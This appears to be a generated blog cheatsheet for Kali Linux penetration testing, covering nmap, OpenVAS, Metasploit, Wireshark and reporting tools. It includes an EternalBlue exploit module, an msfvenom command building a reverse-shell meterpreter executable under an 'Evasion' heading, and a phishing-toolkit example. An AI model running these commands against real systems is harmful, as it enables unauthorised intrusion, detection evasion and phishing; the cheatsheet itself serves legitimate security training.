Cheatsheets

Kali Linux: The Penetration Testing Toolkit Cheatsheet

by n8n admin

πŸ›  Security Tool Cheatsheet

Alex Morgan — Senior Penetration Tester

What is Kali Linux?

Kali Linux is a Debian-based distribution specifically aimed at advanced penetration testing and security auditing. It comes pre-installed with numerous testing tools and is widely used by security professionals.

Installation

To install Kali Linux, download the ISO from the official website. Follow the installation instructions for your platform, whether it is a bare metal or virtual environment.

Basic Syntax

When using Kali tools, the basic syntax generally follows this pattern:

kali_tool --option value

Discovery

Discovery tools help in mapping out the environment and identifying active systems.

Nmap

One of the most popular network scanning tools is Nmap.

Flag Description
-sS SYN scan (stealth scan)
-p Specify port(s) to scan
-O OS detection 
nmap -sS -p 1-65535 -O

Scanning

Scanning tools allow you to uncover vulnerabilities.

OpenVAS

OpenVAS is an open-source vulnerability scanner.

openvas-setup
openvas-start

Exploitation

Tools for exploiting identified vulnerabilities.

Metasploit

Metasploit is the most widely used exploitation framework.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue

Analysis

Post-exploitation analysis tools.

Wireshark

Wireshark is a powerful network protocol analyzer.

wireshark

Evasion

Tools designed to help escape detection during testing.

Obfuscation Tools

Use tools like Veil or msfvenom for payload obfuscation.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe

Reporting

Tools to generate reports on findings.

Dradis

Dradis is used for reporting and knowledge sharing.

dradis

Quick Reference Table

Tool Use
Nmap Network discovery and scanning
OpenVAS Vulnerability assessment
Metasploit Exploitation framework

Pro Tips

  • Automation: Use scripting to automate repetitive tasks.
  • Updating: Regularly update your tools to ensure you have the latest exploits.
  • Customization: Tailor your scanning parameters based on the target environment.
  • Logging: Always log your sessions for later analysis.

Real-World Examples

A few quick scenarios:

  • Scanning a web application: 
    nikto -h http://target-ip
  • Phishing campaign: 
    setoolkit

Related Posts

Practical Security Tool Cheatsheet: Nmap

πŸ›  Security Tool Cheatsheet Alex Morgan — Senior Penetration Tester What is Nmap? Nmap (Network Mapper) is an open-source tool used for network exploration and security auditing. It is widely utilized by security professionals and…

Nmap Security Tool Cheatsheet

πŸ›  Security Tool Cheatsheet Alex Morgan — Senior Penetration Tester What is Nmap? Nmap (Network Mapper) is a versatile open-source tool used for network discovery and security auditing. It is widely favored by security analysts…

Leave a Reply

Your email address will not be published. Required fields are marked *